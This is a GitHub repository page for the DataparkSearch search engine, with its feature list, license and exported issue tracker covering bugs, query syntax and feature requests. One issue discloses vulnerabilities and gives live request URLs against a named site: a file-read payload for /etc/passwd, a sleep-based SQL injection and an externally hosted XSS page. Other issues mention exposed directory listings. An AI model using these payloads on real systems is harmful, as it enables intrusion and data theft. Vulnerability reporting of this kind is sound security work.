brianleepzx / dataparksearch

Automatically exported from code.google.com/p/dataparksearch

License: GNU General Public License v2.0

Makefile 7.09% M4 1.15% Shell 5.27% Slash 1.26% C 63.66% C++ 3.97% Perl 0.72% XS 0.35% POV-Ray SDL 2.29% PHP 0.12% xBase 11.90% Scilab 0.14% HTML 1.72% Batchfile 0.36%

dataparksearch's Introduction

DataparkSearch v.4

Full-featured web search engine

Documentation and auxiliary files

Discussion group

Feel free to ask any question about the DataparkSearch Engine in the DataparkSearch group on Google Groups

Features

  • Support for http, https, ftp (passive mode), nntp and news URL schemes.
  • htdb virtual URL scheme for SQL database indexing.
  • Indexes text/html, text/xml, text/plain, audio/mpeg (mp3) and image/gif mime types natively.
  • External parsers support for other document types, including Microsoft Word, Excel, RTF, PowerPoint, Adobe Acrobat PDF and Flash.
  • Can index multilingual sites using content negotiation.
  • Can search all of the word forms using ispell affixes and dictionaries.
  • Synonym, acronym and abbreviation query expansion based on editable dictionaries, specified by language and charset.
  • Stop-words, synonyms and acronyms lists.
  • Options to query with all words, all words near each other, any words, or Boolean queries. A subset of VQL (Verity Query Language) is supported.
  • Popularity Rank based on a neural network model.
  • Results can be sorted by relevancy (using vector calculation); by popularity rank, either "Goo" (adding weight for incoming links) or "Neo" (neural network model); by last-modified time; or by "importance" (a combination of relevancy and popularity rank).
  • Supports a wide range of character sets, with automated character set and language detection.
  • Offers an accent insensitive search option.
  • Provides phrase segmenting (tokenizing) for Chinese, Japanese, Korean and Thai.*
  • Includes an indexer and a web CGI front-end, as well as a search module for Apache web server (mod_dpsearch).
  • Handles Internationalized Domain Names (IDN).
  • A summary extraction algorithm automatically summarizes each document in several sentences.
  • Uses If-Modified-Since for efficient transfer of only changed files.
  • Can tweak URLs with session IDs and other weird formats, including some JavaScript link decoding.
  • Can perform parallel and multi-threaded indexing for faster updating.
  • Flexible update scheduling, including options for checking some sections of a site more frequently.
  • Handles basic authentication (user name and password) and cookies.
  • Stores a compressed text version of the documents for extracting and viewing.
  • Can specify a default character set and language for a server or subdirectory, or a list of possible languages.
  • Noindex tags: <!--UdmComment-->, <NOINDEX>, <!--noindex-->, and Google's special comments <!-- google_ad_section_start -->, <!-- google_ad_section_start(weight=ignore) --> and <!-- google_ad_section_end --> are recognized as tags to include or exclude content from indexing.
  • Can specify a content body tag.
  • Spellchecking for query words with aspell.
  • Flexible options and commands to customize search result pages.
  • Effective caching significantly reduces search times.
  • Query logging stores the query, query parameters and the number of results found.

Disclaimer (see LICENSE for details)

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

Additional permission under GNU GPL version 3 section 7

If you modify this program, or any covered work, by linking or combining it with the OpenSSL project's OpenSSL library (or a modified version of that library), containing parts covered by the terms of the OpenSSL or SSLeay licenses, the Free Software Foundation grants you additional permission to convey the resulting work. Corresponding Source for a non-source form of such a combination shall include the source code for the parts of OpenSSL used as well as that of the covered work.

dataparksearch's People

Contributors

maxime2

Watchers

James Cloos

dataparksearch's Issues

Syntax Error messages in PostgreSQL log

Hi,

my postgresql log contains many error messages like
2010-06-02 23:09:48 CEST ERROR:  syntax error at or near "WHERE" at
character 86
2010-06-02 23:09:48 CEST STATEMENT:  UPDATE server SET enabled=1, tag='',
category=0, command='S', parent='0', ordre=147% WHERE rec_id='-306536636

I guess that "ordre=147%" is not correct and should in fact be
"ordre=147", so the dps_snprintf() statements in sql.c at lines 1080 and
1090 should be changed accordingly: "ordre=%d%" probably has to be replaced
by "ordre=%d". I haven't tried that yet and don't know whether this
behaviour was intended, but either way PostgreSQL doesn't like it.
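
For illustration, here is a minimal standalone sketch of the suspected typo;
the buffer and query text are invented stand-ins, not the actual sql.c code
(which uses the project's own dps_snprintf rather than snprintf):

#include <stdio.h>

int main(void) {
    char buf[128];
    int ordre = 147;

    /* buggy form: the stray percent after %d ends up as a literal "%" in
       the SQL text; "%%" is used here to reproduce that output portably */
    snprintf(buf, sizeof(buf), "UPDATE server SET ordre=%d%%", ordre);
    printf("%s\n", buf);  /* ordre=147%  -> PostgreSQL syntax error */

    /* proposed fix: plain %d with no trailing percent */
    snprintf(buf, sizeof(buf), "UPDATE server SET ordre=%d", ordre);
    printf("%s\n", buf);  /* ordre=147   -> parses fine */
    return 0;
}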

Cheers,
- Daniel

Original issue reported on code.google.com by [email protected] on 2 Jun 2010 at 9:26

Possible PHP configuration file

What steps will reproduce the problem?
These directories may contain configuration files that hold both a username 
and a password for an SQL database. Most sites with forums run a PHP message 
base. This file gives you the keys to that forum, including FULL ADMIN access 
to the database.

Directories:

http://blog.dataparksearch.org/wp-includes/js/tinymce/plugins/spellchecker/

http://blog.dataparksearch.org/wp-includes/js/tinymce/

Original issue reported on code.google.com by [email protected] on 27 Jun 2012 at 4:55

Regex expressions in stopword file

This is more a question or feature request.

We have many words in our database (non-cached mode) that are irrelevant to
the search engine and we would like an easy mechanism to exclude them from
the index. For example, dict16 and dict32 have thousand of words, with
multiple occurrences, that begin with "$##" and then a string of numbers.
For us, words of this pattern are irrelevant and we would like to not index
them. Is there a way to use regular expressions in the stopwords file? Any
other way to achieve the same result without brute forcing the stopwords
file with every combination we find?
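
For what it's worth, a POSIX extended regex for the pattern described above
could look like the standalone sketch below; whether the stopwords file
could accept such patterns is exactly the open question here, and the
pattern and sample word are only illustrative:

#include <regex.h>
#include <stdio.h>

int main(void) {
    regex_t re;
    /* \$ is a literal dollar sign, ## are literal hashes,
       [0-9]+ is a run of digits */
    if (regcomp(&re, "^\\$##[0-9]+$", REG_EXTENDED | REG_NOSUB) != 0)
        return 1;
    const char *word = "$##12345";  /* sample word of the kind described */
    printf("%s %s\n", word,
           regexec(&re, word, 0, NULL, 0) == 0 ? "matches" : "no match");
    regfree(&re);
    return 0;
}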

Thanks!

Original issue reported on code.google.com by [email protected] on 6 Nov 2009 at 9:35

Incorrect results: "(expression1) AND NOT (expression2)"

Occasionally queries of the pattern:
"expression1 AND NOT expression2" 
give incorrect results for complex expressions.

All versions of dpsearch up to the 4.53 snapshots.

Gut feeling is that the parser fails and treats AND or NOT as regular words
rather than as boolean operators in some situations.

Original issue reported on code.google.com by [email protected] on 15 Jun 2009 at 4:55

Problems with some queries

Version: June drop of 4.53.
Using the following parameters:
/cgi-bin/search.cgi?cmd=Search!&dt=back&dp=30d&s=DRP&m=bool&fmt=long&wm=wrd&sp=1&sy=1&wf=2221&type=&GroupBySite=no

The following query does not give the expected results:

((allinmeta.feedsource: (newsedge)) AND (allinmeta.company: (293122 OR 5071187)) AND (allinmeta.source: ("Kansas City Star" OR "New York Times")))

whereas the following, which seems to be incorrect, does:

((allinmeta.feedsource: (newsedge)) AND (allinmeta.company: (293122 OR 5071187)) AND (allinmeta.source: (Kansas City Star OR New York Times)))

The only difference is that in the first the sources have quotes around the
names. The actual articles do have "New York Times" as the source.

Original issue reported on code.google.com by [email protected] on 21 Jul 2009 at 1:50

SQL injection, XSS, Cross Site Scripting, File Include

What steps will reproduce the problem?
1.File Include

In the file storedoc.cgi

Reading of files: /etc/passwd

Via the GET parameter DU, reading of the file file:///etc/passwd:
/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146

2.Blind SQL Injection

In the file search.cgi

'=sleep(2)=' URL-encoded in the GET parameters cmd, GroupBySite, np, s, site:
/kurgan/s?cmd=%25D0%259D%25D0%25B0%25D0%25B9%25D1%2582%25D0%25B8%27%3dsleep%282%29%3d%27&GroupBySite=yes&np=0&q=1&s=DRP&syn=1

The query that gets executed:
INSERT INTO qinfo (q_id,name,value) VALUES (82971,'cmd','%D0%9D%D0%B0%D0%B9%D1%82%D0%B8'=sleep(2)='')

3. Cross Site Scripting

In the file storedoc.cgi

Loading of an arbitrary page from the Internet, with the possibility of
executing JavaScript code:

http://kurganland.ru/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=http://himic.ru/xss.html&L=tr&label=&q=1&rec_id=1332401146

Execution:
http://kurganland.ru/kurgan/cache?DU=http://himic.ru/xss.html

More details:
http://blog.himic.ru/HiMiC/2012/07/31/dataparksearch-engine-sql-injection-xss-cross-site-scripting-file-include.html

Original issue reported on code.google.com by [email protected] on 27 Aug 2012 at 9:48

Attachments:

indexer hangs on some NNTP (news) URLs

What steps will reproduce the problem?
1. Server nntp://mynewsserver/

What version of the product are you using? On what operating system?
DPS 4.53, built as a package and installed on Ubuntu 10.04
The server is Eserv 2.99
DB is MySQL 5.1.41-3ubuntu12.9

Original issue reported on code.google.com by [email protected] on 1 Mar 2011 at 2:57

Attachments:

News (NNTP) search - too few results

The indexer found over 11 thousand messages on our news (NNTP) server. It 
seems they really are there.

But queries return too few results.

Queries for words that must be present in the headers and bodies of messages, 
like authors' names (Latin only! Cyrillic has not been tested yet!), return 0 results.

A query for the server address brought only 35 results, and 10 of them are 
group names like news://newsserver/books. The others are like 
news://newsserver/books/745 with an empty $(Body), so they are not useful.


DPS 4.53, built as a package and installed on Ubuntu 10.04
The server is Eserv 2.99

Different NNTP clients (Thunderbird, Outlook) work well with this server.

Original issue reported on code.google.com by [email protected] on 3 Mar 2011 at 7:53

runsplitter hangs after delete

What steps will reproduce the problem?
1. Create a new index (with nothing indexed in it).
2. Simulate a delete (indexer -Cwf list of urls)
3. Run the runsplitter 

What is the expected output? What do you see instead?
Runsplitter should complete. Instead it hangs looking for del-split.log.

What version of the product are you using? On what operating system?
subversion as of 10/23

Please provide any additional information below.


Original issue reported on code.google.com by [email protected] on 28 Oct 2008 at 5:57

Remove unreferenced pages after indexing

Suggestion: remove unreferenced pages after indexing, not during indexing.


See 
http://www.dataparksearch.org/cgi-bin/simpleforum.cgi?fid=03&topic_id=1295977964

Original issue reported on code.google.com by [email protected] on 13 Feb 2011 at 5:06

stored_href is not always filled in since 4.52

Under certain circumstances, when there are multiple indices and searchd
daemons running, the stored_href is replaced.

The problem seems to be the following code around line 710:
DpsVarListReplaceStr(&Doc->Sections, "Z", "Z");
The old code, which works, had:
DpsVarListReplaceStr(&Doc->Sections, "Z", "");


Original issue reported on code.google.com by [email protected] on 28 May 2009 at 12:48

Compiling under Ubuntu 9.10

Hi,

I've followed all the steps in the documentation, but for some reason, when
I try to compile it, it fails. The output is in the attached file.

I would really appreciate some help on this matter.

Thank you very much.

Original issue reported on code.google.com by [email protected] on 13 Dec 2009 at 1:15

Attachments:

query with allinxx: behaves oddly

Was looking for all documents where the source was not "associated press"
and had the word insurance.

The following query does not seem to work as expected:
insurance and not (allinmeta.source: "associated press")

This query seems to work but not sure it is correct as per the intent:
insurance and (allinmeta.source: not "associated press")

Original issue reported on code.google.com by [email protected] on 25 Mar 2009 at 2:28

double free or corruption backtrace

We are exploring search options for use within the Fedora Project, and in 
our tests of running the crawler (indexer) we are running into an occasional 
backtrace. It seems to be almost at random; I don't notice anything in 
common about the URL it hits before the backtrace each time.

I've attached the backtrace, and am happy to provide any more information 
we can to help get this solved.

What version of the product are you using? On what operating system?

indexer from dpsearch-4.53-pqsql

[root@junk09 dpsearch]# cat /etc/redhat-release 
Red Hat Enterprise Linux Server release 6.2 (Santiago)

[root@junk09 dpsearch]# uname -a
Linux junk09.qa.fedoraproject.org 2.6.32-220.4.1.el6.x86_64 #1 SMP Thu Jan 19 
14:50:54 EST 2012 x86_64 x86_64 x86_64 GNU/Linux



Please provide any additional information below.

Again, if there's anything we can do, we're happy to work with you to try 
and get this fixed. :)

Original issue reported on code.google.com by [email protected] on 13 Feb 2012 at 7:38

Attachments:

Multi-dbaddr is broken in 4.52 onwards

Set up dpsearch with multiple indices, each with its own searchd daemon.
Set up search.htm to search across all the searchd daemons.
If there are duplicate articles between the indices, you will sometimes get
results with no document information, depending on the order of the searchd
daemons specified in search.htm.

The problem lies around line 348 in the file src/searchd.c:

DpsDocFromTextBuf(&Res->Doc[ndocs], tok);
#ifdef WITH_MULTIDBADDR
{
  char *dbstr = DpsVarListFindStr(&Res->Doc[ndocs].Sections, "dbnum", NULL);
  if (dbstr != NULL) {
    Res->Doc[ndocs].dbnum = DPS_ATOI(dbstr);
  }
}
#endif

Assigning Res->Doc[ndocs].dbnum causes the db number to be set incorrectly,
and the document is looked for in the wrong index. Previous versions did not
have that code, and the assignment DpsDocFromTextBuf(&Res->Doc[ndocs], tok);
was after the #endif.

Commenting out the whole if (dbstr) ... clause and moving the assignment
back to its old position seems to fix the problems.


Original issue reported on code.google.com by [email protected] on 14 May 2009 at 5:18

Sub-string searches

Hi Maxime,

We are using the latest snapshot 4.53 from 2010_01_19 (with stop word regex
expressions, thanks!) on Red Hat 5.4 64-bit with MySQL 5.1.42.

Our MySQL database is roughly 4 million URLs with 20GB of data and
indexes. We originally started using cache mode, but our users weren't
pleased with the results. The root of the issue was the inability to perform
sub-string searches, which isn't supported by cache mode. So we switched
over to MySQL multi-mode without CRCs so that it supports sub-string searches.

Our indexing speed greatly improved with MySQL, but search performance
has suffered. We sacrificed speed for relevancy, in our opinion. We are
actually quite disappointed with MySQL and its inability to support query
parallelization. Our server has multiple cores and lots of memory, so we
have loaded all the tables and indexes directly into memory, about 20GB
worth. We've noticed that an individual query to a single dictionary table
with 75 million rows returns rather quickly, around 3 seconds. This
performance is OK, but we see a chance to improve sub-string searches and
improve performance. Every query that dpsearch issues uses a LIKE statement
and needs to scan the entire index. We realize this is the price we pay to
support sub-string searching. The issue we see is that dpsearch issues a
query to the dict(x) table, waits for the result, issues the next query to
the dict(x+1) table, waits for the results, then dict(x+2), and so on up to
dict32, then combines the results. Does dpsearch have the ability to issue
multiple queries at once, possibly a configurable number of queries? This
feature would get around MySQL's inability to support query parallelization
and use some wasted resources on our server. Any thoughts or other
suggestions to get good performance with sub-string searches?

Thanks for all your hard work. 

Original issue reported on code.google.com by [email protected] on 27 Jan 2010 at 7:10

Suppress Links During Searches

Hello Maxime,

We are using the latest 4.54 snapshot.

We have a URL (call it indexList.html). indexList.html has links to 16
other URLs, call them indexList0.html, indexList1.html through
indexListF.html, for a total of 16 links. These 16 pages contain about 2,000
links per page and provide a means to access files that are stored in a
database file vault. Without these generated pages, the indexer can't find
the files in the vault. We want the indexer to find and index all files
contained on the 16 html pages labeled 0 through F, but not to serve up the
URLs indexList0.html through indexListF.html themselves during searches.

Since each page 0-F has thousands of links, the search results tend to find
and rank the indexList0.html-type pages higher than the contents and files
found on those pages.

We've tried various combinations of HrefOnly and can't seem to get the
desired functionality. It appears you can control whether the contents of a
page are indexed, but not whether a link is indexed. It seems that if a link
is "allowed" then it is indexed. We want to "allow" a link, but not index
the link.

We want to scan the links and contents of the page
We want to scan all the files and URLs on the page with all
2.
3.

What is the expected output? What do you see instead?


Original issue reported on code.google.com by [email protected] on 11 May 2010 at 3:12

Segmentation fault during indexing

What steps will reproduce the problem?
1. Indexing documents (/sbin/indexer -am -g 04)
2.
3.

What is the expected output? What do you see instead?

It crashes with a segmentation fault.

What version of the product are you using? On what operating system?

v1.50 (snapshot from 5 July 2008)

Please provide any additional information below.


It crashes only on some documents, and somehow only on a table into which
the bodies of PDF documents were dumped by a script, with file names used
as the indexes. Maybe invalid characters occur there? Or are text indexes
digested poorly?

A table of 3000 documents, which were simply loaded in manually using the
text editors on the site, is indexed without problems.

Original issue reported on code.google.com by [email protected] on 9 Jul 2008 at 1:22

Attachments:

Enhancement: Search document and limit by metatags

Many web documents have tags that look like:
<meta name="topic" content="insurance automobiles"/> 
<meta name="location" content="USA UK Germany"/>
or other relevant information.

Currently dpsearch allows searches to be limited by time frames (e.g. limit
search only to the last week). 

It would be good to be able to limit searches by metatags so that, for
content with metatags like the example ones above, we could limit searches
to only metatag=topic,content=automobiles or
metatag=topic,content=automobiles,metatag=location,content=USA

Not sure what the syntax should be, given that we would probably want to
limit searches by multiple different metatags and different values for
them. Simplistically, the syntax could look like:
q="somedata"&metatag="topic:automobiles,insurance"&metatag="location:USA,UK" 

etc.

Original issue reported on code.google.com by [email protected] on 29 Jul 2008 at 11:28

Enhancement: User defined plugins.

DPsearch has the ability to search across a very large set of documents (we
have tested with over 20M). We can search the entire document space or
parts of documents based on the concept of sections and limits (like
meta-tags, last-modified date, ...). However, like most search engines,
searches are restricted to information that has been indexed. Thus, if we
have some new information about a document, or existing information that
was not used to create special section or limit indexes, it becomes
difficult to use it without re-indexing the collection. Additionally, such
restrictions are often best dealt with by other programs that can apply
logic that is not necessarily of a "search" type. A couple of examples:

Let's assume that the indexed documents have some information about, say,
the geography associated with each document. However, when the collection
was originally indexed, geography was not considered important and no
geography section was created. It would be nice to be able to search the
document collection for the search criteria and then filter the results by
some geography restriction. Obviously the simplest solution would be to add
a definition of a geography section and re-index the collection. However,
with very large collections this is very expensive both in terms of time
and disk space. In addition, we could end up with literally dozens if not
hundreds of sections.

Another situation would be where the documents found need to be restricted
on some criteria not related to the search (e.g. only show the documents
"permitted" to the user making the query). Again, in theory we could index
in some combination of ownership and other restrictions - but the
information is pretty dynamic, and we would need to re-index all the time.

The proposed solution is to add the notion of "filter plugins" to
dpsearch. The dpsearch engine gathers all the search results into an array
and then, after removing duplicates, clones etc., retrieves the document
information for a pageful. Now imagine a small user-provided function that
is called after the result list is built and cleaned but before the
document-information retrieval step. The filter could get the list of
record ids for the documents and return a modified list that may have some
records removed (or added?) based on external criteria. This would allow
fine-grained local control over the results. If such a mechanism were
available, we could solve the situations above by doing the following:

Build a new database table (in the same database as used by dpsearch or a
separate one) that tracks the record id and has columns for other
meta-data. The plugin would then filter the results using the database
information. Clearly it will be slower than a native index, but for
infrequently used metadata, or as a transitional mechanism for new metadata
that will eventually be indexed, this would work quite well.

Similarly for the second example the plugin would call an external
permissions program that could resolve the permission based on other
criteria which have nothing to do with the search engine.

Finally, we could add records into the result set if deemed necessary
(though I suspect that this is better done outside the search engine when
creating a results page).

The changes that I see would be:

Ability to build a plugin - best would be the ability to have a shared
library that can be set up in the config file. If defined and present, the
search engine would use it; if not, it would not. The plugin API should be
very simple, at least for starters (a hypothetical sketch follows this list):
- Call to initialize the plugin
- Call to re-initialize the plugin (when the search engine gets a HUP signal)
- Call to terminate the plugin
- Call to process a result list (I suspect just an array of proposed
results and a command line, returning the array of results)
- We could add additional APIs available to the plugin to access dpsearch
functions for ease of writing the plugin - e.g. functions to print messages
into the log ...
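
A hypothetical sketch of what such a plugin API could look like as a C
header; every name here is invented for illustration and is not part of
DataparkSearch:

#include <stddef.h>

/* list of proposed results handed to the plugin */
typedef struct {
    int   *rec_ids;  /* record ids of the candidate documents */
    size_t count;    /* number of candidates */
} dps_plugin_results;

/* called once when the search engine starts */
int  dps_plugin_init(const char *params);

/* called when the search engine receives a HUP signal */
int  dps_plugin_reinit(const char *params);

/* called at shutdown */
void dps_plugin_term(void);

/* filter (or extend) the result list in place, using the command-line
   style parameters passed through from the query; returns 0 on success */
int  dps_plugin_process(dps_plugin_results *results, const char *params);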

Changes to dpsearch:
- Additional parameters to pass information to the plugin, e.g.
&pluginparms="parm1, parm2, parm3"
- Configuration file changes to define the plugin
- Code changes to call the plugin

Questions:
- What happens if there are multiple plugins? Particularly for passing
command-line parameters over.
- Where is the plugin called - when the results are obtained in cache.c or
sql.c, or when they are assembled in search.c? Each has a plus/minus in
terms of access to information (e.g. if there are multiple indexes, calling
the plugin from cache.c or sql.c means the plugin can get the correct
database information and use it, as opposed to search.c, where the search
may be running on a machine with no access to the actual database).
- What languages should be allowed? Clearly the application is in C, so C
or C++ is natural - however, it is also easier to write plugins in some
scripting language.


Original issue reported on code.google.com by [email protected] on 18 Aug 2008 at 1:09

Incorrect results and segfault while searching using trunk version.

What steps will reproduce the problem?
1. Create an index with a June snapshot
2. Search the index with the current trunk branch.
3. No results for "c b" and segfault for "a j g"

What is the expected output? What do you see instead?
For the first search, 267 results were expected (the June snapshot gave that
number), and definitely not a segfault.

What version of the product are you using? On what operating system?
Noted above. On Linux with a clustered setup (indexer and search engines
separated).

Please provide any additional information below.


Original issue reported on code.google.com by [email protected] on 13 Jul 2008 at 1:14

indexer -Ecreate

I'm trying to set up dataparksearch, but I'm having trouble running "indexer 
-Ecreate"

Output:

Sphinx 2.0.4-release (r3135)
Copyright (c) 2001-2012, Andrew Aksyonoff
Copyright (c) 2008-2012, Sphinx Technologies Inc (http://sphinxsearch.com)

ERROR: malformed or unknown option near '-Ecreate'.

Original issue reported on code.google.com by janbjorge on 18 May 2013 at 2:38

Highlighting of search queries in HTDB search results

IMHO, highlighting of search-query occurrences in the search results is
needed when the HTDB scheme is used. That is, storage of documents indexed
via HTDB in the stored database needs to be implemented.

Original issue reported on code.google.com by [email protected] on 27 May 2009 at 12:32

(allindp_id: nnn) does not work

Tried against the latest snapshot. It does not work with or without the
section definition. Definition used was:
Section DP_ID 3 64
also tried
Section dp_id 3 64

Original issue reported on code.google.com by [email protected] on 28 May 2009 at 2:36

Enhancement: Use document from web instead of stored

Currently the only way to get highlights in results is to use stored.
However, when the documents being indexed come from a local file system or
web server, it does not make sense to keep a complete additional copy of
the site just for highlighting.

It would be good to have an enhancement to the stored feature (I guess
stored.cgi - though not sure how this would work if we are using
mod_dpsearch in Apache) to indicate that the document to be returned with
the query terms highlighted should be fetched using the original URL rather
than from a local copy.

Original issue reported on code.google.com by [email protected] on 29 Jul 2008 at 11:20

Date handling is not robust enough

If the incoming file has a "Last-Modified" tag that looks like
<meta http-equiv="Last-Modified" content="Thu, 15 Jan 2009 18:40:46 EST"/>
the timezone seems to be ignored and the time is instead treated as GMT.
Also, the parser is quite strict about the format, and slight variations
seem to throw it off.

There are a number of more flexible date parsers available, both in GNU
glibc and under other GNU-like licenses. Probably one of those should be
used? cURL seems to have a good one:
https://www.koders.com/c/fidFDF8CF1254129577CE4A24545AF8DF31CA6E2E1A.aspx?s=md5
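
As a point of reference, libcurl also exposes its date parser as a public
function, curl_getdate(); a minimal sketch, assuming the libcurl
development headers are installed:

#include <curl/curl.h>
#include <stdio.h>
#include <time.h>

int main(void) {
    /* the example "Last-Modified" value from above, timezone included */
    time_t t = curl_getdate("Thu, 15 Jan 2009 18:40:46 EST", NULL);
    if (t == (time_t)-1) {
        fprintf(stderr, "unparsable date\n");
        return 1;
    }
    printf("parsed epoch: %ld\n", (long)t);
    return 0;
}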

Original issue reported on code.google.com by [email protected] on 16 Jan 2009 at 1:35

SearchD gives internal server error

Trying to get searchd to run, we have performed the following.
1. searchd.conf is configured with defaults from the dist file
2. In search.htm we have the following two DBAddr lines:
   a. DBaddr mysql://user:pass@localhost/dpesarch/?socket=/var/lib/mysql/mysql.sock&dbmode=multi&trackquery&stored=localhost
   b. DBaddr searchd://localhost/

All processes, including searchd, are running on the same machine. 

When we navigate to the search homepage it is displayed, but when a search
is performed we receive an Internal Server Error (500).

We are using v4.51 (we can't successfully run 4.52 or 4.53).

Any ideas or additional configuration necessary?

Original issue reported on code.google.com by [email protected] on 1 Oct 2009 at 5:57

Invalid FSF Address

As I said in Issue #39, I'm looking at packaging this for use within Fedora 
Infrastructure.

In my review request (https://bugzilla.redhat.com/show_bug.cgi?id=794542) it 
was pointed out that dpsearch's include files contain outdated FSF address 
information. Should be a fairly simple fix that would make a lot of rpmlint 
errors go away, if you're willing to. :-).

Thoughts?

Original issue reported on code.google.com by [email protected] on 18 Feb 2012 at 2:47

MS SQL Server Compatibility/Issues

In our quest to use a database with full sub-string searching capability,
we have compared the performance of Postgres, MySQL and MS SQL Server 2005.
Without a doubt, SQL Server is the fastest for full index scans on tables
with 100+ million rows.

So we are trying to get dpsearch to work with SQL Server 2005. We are using
multi-mode via unixODBC and FreeTDS (latest versions for both). 

1. The scripts to create the db tables are out of date. Several tables
(robots and cookies) are missing, and some fields are missing, like
charset_id from url. There are a few other issues. These issues were easily
resolved, but can they be fixed in the distribution? If you would like, I
could provide the updated files.

2. When performing the initial setup with the -Ecreate command, it works
fine. The srvinfo table appears to be populated correctly. During indexing
no documents are indexed, but there are no errors. Also, a simple command
like "./indexer -S" returns an error.

When running ./indexer -S with the debug_sql #define turned on in
sqldbms.c, the error message is:
{sqldbms.c2621} Query: COMMIT
    SQL-server message: [unixODBC][FreeTDS][SQL Server]The COMMIT
TRANSACTION request has no corresponding BEGIN TRANSACTION. Then the same
line repeats

The resulting output/statistics from the -S command is empty, just the
headers and predefined content.

I have used SQL Server profiler and captured the commands sent to the
server by dpsearch, they are as follows:
1) SET IMPLICIT_TRANSACTIONS ON
2) IF @@TRANCOUNT > 0 COMMIT
3) Select status, sum(case when next_index_time <= 1266421936 then 1 else 0
end), count(*), sum(docsize), sum(case when next_index_time <= 1266421936
then docsize else 0 end) from url Group By status order by status
4) If @@TRANCOUNT > 0 COMMIT
5) COMMIT
6) IF @@TRANCOUNT > 0 COMMIT

I've run these commands (as a batch) directly on SQL Server and they return
the same error message. If I remove the standalone COMMIT in line 5, it
works.

I have also successfully run the same set of commands, without the extra
COMMIT, via tsql (which comes with FreeTDS), and the data is returned
successfully.

If I comment out the COMMIT being sent by dpsearch near line 2621 of
sqldbms.c then I don't receive the SQL Server error message, but the status
results are still zero and indexing is still not performed.

It appears that select statements are not functioning properly, but inserts
are working.

Are there special options to compile unixODBC and FreeTDS for use with
dpsearch relating to auto-commit of transactions? Any other thoughts?
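
For context, autocommit in ODBC is normally toggled per connection with
SQLSetConnectAttr; whether and where dpsearch sets this attribute is
exactly the open question above, so the sketch below (assuming unixODBC
headers) is only illustrative:

#include <sql.h>
#include <sqlext.h>

/* with autocommit on, the driver wraps each statement in its own
   transaction, so no standalone COMMIT should ever be sent */
void enable_autocommit(SQLHDBC hdbc) {
    SQLSetConnectAttr(hdbc, SQL_ATTR_AUTOCOMMIT,
                      (SQLPOINTER)SQL_AUTOCOMMIT_ON, 0);
}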

Our version is dpsearch-4.53-19012010 compiled with multi-mode and unixODBC
support.


Thanks in advance.

Original issue reported on code.google.com by [email protected] on 17 Feb 2010 at 4:30

free() pointer error in 4.53 12092009

1. Run indexer with the -C option and answer "YES"; the database is cleared
and the following error is received.

Deleting...Done
*** glibc detected *** ./indexer: free(): invalid pointer: 0x097e95b0 ***
======= Backtrace: =======
/lib/libc.so.6[0x38fb16]
/lib/libc.so.6(CFREE+0x90)[0x393030]
/usr/local/dpsearch/lib/libdpsearch-4.so(DpsDBFree+0x30)[0x916a90]
/usr/local/dpsearch/lib/libdpsearch-4.so(DpsDBListFree+0x35)[0x916bf5]
/usr/local/dpsearch/lib/libdpsearch-4.so(DpsEnvFree+0x46)[0x905896]
./indexer[0x804b530]
/lib/libc.so.6(__libc_start_main+0xdc)[0x33cdec]
./indexer[0x8049d91]

This error occurs on RHEL5 32-bit.

The same error occurs for many other commands.


Original issue reported on code.google.com by [email protected] on 22 Sep 2009 at 8:21

storedoc.cgi does not honor &tmplt parameter

What steps will reproduce the problem?
1.Setup dpsearch to use storedoc
2. Try to use a different storedoc template by passing in the parameter
&tmplt=storedoc-2.htm


What is the expected output? What do you see instead?
It should use the new template. Instead it uses the template called
storedoc.htm. If that is not there, you get an error about the template not
being found.

What version of the product are you using? On what operating system?
4.51 latest snapshot.

Please provide any additional information below.


Original issue reported on code.google.com by [email protected] on 19 Aug 2008 at 2:01

Licensing: OpenSSL

I'm trying to package DataparkSearch for use within Fedora Infrastructure 
(review request is here: https://bugzilla.redhat.com/show_bug.cgi?id=794542 )

It was brought to my attention that dpsearch links against OpenSSL but does 
not provide an exception in the license for it. I was asked to inquire 
whether you would possibly add an exception to dpsearch's license for this 
(see http://en.wikipedia.org/wiki/OpenSSL#Licensing ), or, if not, maybe add 
the ability to use GnuTLS, but that would likely be more work.

Is this something you'd be willing to discuss?

Thanks!

Original issue reported on code.google.com by [email protected] on 18 Feb 2012 at 2:44

Query performance improvements

The query caching mechanism works well for queries. However, users often
issue a lot of patterned queries, e.g. expression1 AND expression2, where
each of the expressions is a complex query in its own right.

It would be nice if the query cache were to cache selected subqueries. That
way, if users reuse expression2 from the above example in a dozen other
queries, they will benefit from the query cache.

Original issue reported on code.google.com by [email protected] on 15 Jun 2009 at 5:31

Files uploaded through FTP containing juicy info are being displayed

What steps will reproduce the problem?

Go to http://blog.dataparksearch.org/wp-includes/images/ and you can see 
files and directories listed there, like an FTP listing; it is the 
wp-includes directory of WordPress.

What is the expected output? What do you see instead?

Files uploaded through FTP by other people; sometimes you can find all 
sorts of things, like important stuff.

What version of the product are you using? On what operating system?

Windows-7

Please provide any additional information below.

Please update me about this issue

Thank you.

Original issue reported on code.google.com by [email protected] on 27 Jun 2012 at 4:33

Query caches

We have multiple search engines deployed for a single index to handle the
load. A query cache is created for a query when it hits a search engine.
However, if the "next" page query hits the second engine, it does not
benefit from the cache and takes just as long as the original query. It
would be good if the query caches could be put on an NFS drive and shared,
so that once a query has run on one search engine the cached result is
available to all.

This probably needs some simple locks while creating and reading the cache
file. Alternately - and probably even more elegant - would be to use
memcached to cache the results.

Original issue reported on code.google.com by [email protected] on 15 Jun 2009 at 5:02

Please see this

Dear Sir,

See this link

https://www.whitefirdesign.com/about/dataparksearch-security-bug-bounty-program.html

Here is bounty mentioned for your website.

But even when I found vulnerabilities in your website, you patched them and 
also deleted the thread; however, I have the full history of the thread in 
my email.

So can you please tell me about my Datapark Search bounty for issues 41 & 42 
(issues now deleted, unfortunately)?

Original issue reported on code.google.com by [email protected] on 29 Jun 2012 at 4:33

dbmode=cache is not documented

